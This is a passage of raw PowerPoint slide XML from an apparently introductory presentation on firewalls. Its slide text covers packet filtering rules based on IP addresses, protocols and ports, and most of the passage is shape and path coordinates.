                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96396C26-0457-0F63-461D-AA4065CDBE97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61369" y="3880154"/>
              <a:ext cx="497427" cy="722629"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F7C8DD-6818-5711-B266-68852CB51EE6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88342" y="4337158"/>
              <a:ext cx="199531" cy="248919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A510AD-849E-3B07-583A-15CB618E5E9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6797421" y="3214280"/>
              <a:ext cx="701040" cy="212725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="701040" h="212725">
                  <a:moveTo>
                    <a:pt x="700913" y="133096"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="670750" y="77584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632231" y="52590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581253" y="31076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520192" y="14300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451421" y="3479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381901" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318706" y="3924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264414" y="14554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221589" y="31127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192836" y="52959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180733" y="79311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181825" y="84099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176390" y="82308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="111213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123482" y="151777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214096" y="136931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249402" y="159829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300380" y="181330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361442" y="198107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430212" y="208927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499732" y="212407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562927" y="208483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617220" y="197866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660044" y="181279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688797" y="159448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700913" y="133096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0" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFFF24ED-FC9F-B360-08F2-710D0797BA17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08265" y="2863800"/>
              <a:ext cx="183924" cy="163274"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="object 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06A207B4-B722-CDEC-F170-4E40B55FC2FD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92852" y="2669129"/>
              <a:ext cx="653779" cy="725170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30909ADE-48B9-5DB6-F464-B8BF2EF4CF09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14258" y="3381052"/>
              <a:ext cx="1135708" cy="726494"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="object 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5F721D-33B2-5E08-C89F-6E4C07009969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06165" y="3373954"/>
              <a:ext cx="1151929" cy="741680"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4A1BCE-5E11-7553-D814-36DE0B2EB663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95185" y="3594596"/>
              <a:ext cx="620075" cy="258268"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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AFF3D35C-4A42-A8F6-147E-7257E76A5F26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3855809" y="2826511"/>
              <a:ext cx="3096895" cy="1448435"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3096895" h="1448435">
                  <a:moveTo>
                    <a:pt x="533933" y="921232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38" y="920089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="929322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533908" y="930452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533933" y="921232"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3096895" h="1448435">
                  <a:moveTo>
                    <a:pt x="3096425" y="238404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3093605" y="229628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980465" y="911504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970366" y="6819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964156" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958621" y="918984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961720" y="922388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958837" y="925982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1608048" y="1448308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613827" y="1441132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="976337" y="928268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358936" y="1045743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2359698" y="1036561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984948" y="919746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3096425" y="238404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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB3A84E-6312-20C6-AD05-1D6691789CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219129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8" name="object 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDFB90B-2502-DBEB-5281-4D1718C54135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219129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92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144799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0D7630C-EA7B-C91B-E73F-662E8A9F8BC1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0FD6265-7B0E-AAB8-9378-E81B67529942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Firewalls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D10CA109-FCEB-B570-27E3-568301D8E58F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F78E57A-9C56-558E-4819-FB3C1D93E6D0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93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84ED3D5-2BCF-942D-7DDF-81E27A5BF9E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1813041"/>
            <a:ext cx="792670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Firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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help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system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administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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114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desktop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users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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to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control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access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network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resources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services.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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="337185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3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firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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work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400" b="1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different</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-2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layers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1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OSI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model,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thus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providing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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different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features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114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protections.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652172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B61D1F5-102C-537B-75AA-6EB13EC86C02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F7D0AB2-8E2B-826A-A1B6-916A1FEBD92B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 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewalls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77B903A-66F8-1236-34A5-B3A3FDAF6F0D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438ECE8-8B89-A2CF-C997-7A58D8B760F4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94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CDDFC06-CC26-6DE1-BFE8-F3B3B7480866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1629475"/>
            <a:ext cx="8049895" cy="236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imperative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understand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firewalls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work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endParaRPr sz="2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what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kind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threats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they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prevent.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Many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people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believe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that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firewalls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and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antiviruses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are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all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they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need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stay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secure,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following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slides</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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see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why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this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idea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wrong.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984767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47E00C5-AF77-A002-6025-013263BB8E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450329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683AADB-993D-7909-CFF0-4E8F30BA9F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537755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Packet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Filtering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Firewalls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9B1807D1-1BA1-58CF-05AE-ED3842DCA1BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236832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5B344269-FA19-C58C-FEAB-30EBC98BB866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236832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95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040490E-987D-19A6-B67A-BB0F8E2AF694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527697" y="1232092"/>
            <a:ext cx="8066405" cy="200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most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basic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feature</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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3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firewall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is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b="1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"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>filtering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4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With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filtering,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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>administrator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can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create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rules which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will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filter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according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certain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characteristics like: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858388D-E4EA-DE86-D5C7-3E35AF7FC563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671562" y="3348851"/>
            <a:ext cx="3234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Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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address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Destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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address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Protocol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A3B264F-0F5B-D699-D9D0-ED0AA837AD7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4605642" y="3348851"/>
            <a:ext cx="24930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Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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port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Destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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Port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4057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436D6BA-0622-A026-7A73-FE1CAFA17C48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976973D-6F05-07EA-6F86-50734B7CFB8C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Packet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Filtering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Firewalls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77A9015-4D07-7F5A-AB9D-88F33F8626AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1193218"/>
            <a:ext cx="8060055" cy="3319145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="193229" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0">
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="252525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Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>filters</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>DSL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>routers</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-125" dirty="0"/>
              <a:t>high-</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>end </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>enterprise</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>routers</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-105" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-105" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>the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cornerstone</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-3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network</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>defense.</a:t>
            </a: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89A5E53A-F5AC-3FE4-4643-7FAD731F825B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2747148" y="1914748"/>
            <a:ext cx="5809052" cy="2616199"/>
            <a:chOff x="2625393" y="1913870"/>
            <a:chExt cx="5809052" cy="2616199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78EE6AEB-D825-CA74-70C7-AC1AADDA3D0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4412371" y="1934456"/>
              <a:ext cx="3993515" cy="2567305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3993515" h="2567304">
                  <a:moveTo>
                    <a:pt x="1674230" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1550915" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484515" y="9489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1418115" y="28469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389658" y="37959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356458" y="47449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266344" y="90154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209429" y="128114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138286" y="185054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090858" y="232504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071886" y="260974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052915" y="284698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033943" y="313168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019715" y="336893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1005486" y="365363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986515" y="393833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977029" y="427048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958058" y="483988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948572" y="517203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943829" y="545672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934343" y="612102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934343" y="697512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905886" y="702257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872686" y="707002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844229" y="716492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811029" y="725982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787315" y="740217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758857" y="759197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735143" y="773432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673486" y="844606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630800" y="925271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621314" y="982211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616572" y="1020171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621314" y="1039151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621314" y="1067621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588114" y="1058131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550172" y="1048641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512229" y="1043896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479029" y="1043896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426857" y="1048641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379428" y="1053386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332000" y="1067621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289314" y="1081855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246628" y="1100835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170743" y="1148285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137542" y="1176755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104342" y="1209970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80628" y="1243185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33200" y="1319105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18971" y="1361809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1447219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1542119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18971" y="1627528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33200" y="1670233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80628" y="1746153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104342" y="1779368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137543" y="1812583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170743" y="1841053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208685" y="1864778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246628" y="1893247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289314" y="1907482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332000" y="1926462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379429" y="1935952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426857" y="1940697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479029" y="1945442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507486" y="1945442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540686" y="1940697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540686" y="1983402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545429" y="2011872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545429" y="2040342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554914" y="2068812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559657" y="2092537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578629" y="2149476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592857" y="2173201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607086" y="2201671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678229" y="2296571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744629" y="2358256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792058" y="2396216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844229" y="2429430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901143" y="2457900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962801" y="2481625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024458" y="2500605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090858" y="2514840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128801" y="2519585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162001" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195201" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1233144" y="2529075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271087" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309030" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384915" y="2514840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422858" y="2505350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489258" y="2486370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527201" y="2476880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1555659" y="2462645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1588859" y="2443665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617316" y="2429430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645773" y="2410450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1678973" y="2391471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1702687" y="2372491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731144" y="2353511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754859" y="2329786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773830" y="2353511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797544" y="2381981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821259" y="2400961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849716" y="2424685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878173" y="2443665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1906630" y="2467390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939830" y="2481625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1977773" y="2500605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015716" y="2514840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2053659" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096345" y="2538565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181716" y="2557545"/>
                  </a:lnTo>
                  <a:lnTo>
